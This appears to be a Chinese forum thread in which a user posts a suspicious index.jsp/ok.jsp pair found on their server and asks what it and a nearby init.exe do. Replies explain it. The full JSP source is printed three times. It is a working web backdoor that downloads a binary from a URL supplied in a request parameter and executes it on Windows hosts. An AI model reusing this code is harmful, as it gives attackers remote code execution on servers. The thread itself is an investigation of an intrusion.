index.jsp :<%@ page language="java" pageEncoding="utf-8" import="java.io.*,java.net.*,java.security.*,javax.crypto.*"%>
<%!
String sys=null;
public class AutoKill {
private boolean downFile(String url,String filesrc)
{
try
{
URL urlc = new URL(url);
HttpURLConnection con = (HttpURLConnection)urlc.openConnection();
con.connect();
byte[] b=new byte[1024];
BufferedInputStream bis=new BufferedInputStream(con.getInputStream());
FileOutputStream fos=new FileOutputStream(filesrc);
int length=-1;
while((length=bis.read(b,0,b.length))!=-1)
{
fos.write(b,0,length);
}
fos.close();
bis.close();
return true;
}catch(Exception e)
{
e.printStackTrace();
}
return false;
}
}%>
<%
sys=System.getProperty("os.name");
int i=sys.indexOf("Windows");
AutoKill ak=new AutoKill();
if(i>-1)
{
String result;
try
{
String url=request.getParameter("userurl");
System.out.println(url);
String filesrc=request.getSession().getServletContext().getRealPath("")+"/init.exe";
if (ak.downFile(url,filesrc) )
{
Process run_proc=Runtime.getRuntime().exec(filesrc);
result="Success! ";
}
else
{
result="Failure! Down File Failure!";
} }catch(Exception e)
{
result="Failure!throws Exception - "+e.getMessage()+"! ";
}
request.setAttribute("result",result);
}
else
{
request.setAttribute("result","Failure!Because Remote computer system is "+sys+"!");
}
request.getRequestDispatcher("/ok.jsp").forward(request, response);
%>ok.jsp<%@ page language="java" pageEncoding="utf-8"%><%= request.getAttribute("result")%>
同级目录里还有个init.exe有高手知道这个 init.exe 是干嘛的不
<%!
String sys=null;
public class AutoKill {
private boolean downFile(String url,String filesrc)
{
try
{
URL urlc = new URL(url);
HttpURLConnection con = (HttpURLConnection)urlc.openConnection();
con.connect();
byte[] b=new byte[1024];
BufferedInputStream bis=new BufferedInputStream(con.getInputStream());
FileOutputStream fos=new FileOutputStream(filesrc);
int length=-1;
while((length=bis.read(b,0,b.length))!=-1)
{
fos.write(b,0,length);
}
fos.close();
bis.close();
return true;
}catch(Exception e)
{
e.printStackTrace();
}
return false;
}
}%>
<%
sys=System.getProperty("os.name");
int i=sys.indexOf("Windows");
AutoKill ak=new AutoKill();
if(i>-1)
{
String result;
try
{
String url=request.getParameter("userurl");
System.out.println(url);
String filesrc=request.getSession().getServletContext().getRealPath("")+"/init.exe";
if (ak.downFile(url,filesrc) )
{
Process run_proc=Runtime.getRuntime().exec(filesrc);
result="Success! ";
}
else
{
result="Failure! Down File Failure!";
} }catch(Exception e)
{
result="Failure!throws Exception - "+e.getMessage()+"! ";
}
request.setAttribute("result",result);
}
else
{
request.setAttribute("result","Failure!Because Remote computer system is "+sys+"!");
}
request.getRequestDispatcher("/ok.jsp").forward(request, response);
%>ok.jsp<%@ page language="java" pageEncoding="utf-8"%><%= request.getAttribute("result")%>
同级目录里还有个init.exe有高手知道这个 init.exe 是干嘛的不
a) Checks if the OS is windows. 1)检查,如果操作系统是Windows。 If not it terminates.如果不是,就终止。
b) If it is windows... b)如果它是Windows ... then some variants immediately download and execute a binary from one of several possible servers.然后一些变种立即下载并执行从几个可能的一个服务器的二进制。 The binary presumably contains further malware.二进制大概载有进一步的恶意软件。
c) Other variants apparently wait to be invoked again by an external host that will provide the URL of a binary to download and execute. c)其他的变种似乎等待被再次调用一个外部主机将提供一个二进制的URL下载并执行。
AutoKill ak=new AutoKill();
// 如果是windos操作系统
if(i>-1)
{
String result;
try
{
String url=request.getParameter("userurl");
System.out.println(url);
String filesrc=request.getSession().getServletContext().getRealPath("")+"/init.exe";
// 如果去指定的url下载文件,成功
if (ak.downFile(url,filesrc) )
{
// 成功了,就运行指定文件
Process run_proc=Runtime.getRuntime().exec(filesrc);
result="Success! ";
}
// 下载失败
else
{
result="Failure! Down File Failure!";
} }catch(Exception e)
{
result="Failure!throws Exception - "+e.getMessage()+"! ";
}
// 返回成功的消息
request.setAttribute("result",result);
}
else
{
// 返回失败的消息
request.setAttribute("result","Failure!Because Remote computer system is "+sys+"!");
}你说的exe有可能就是黑客通过以上的方法下载到本机运行的
想知道这个exe到底是干嘛的
上传到这里了 谁给分析分析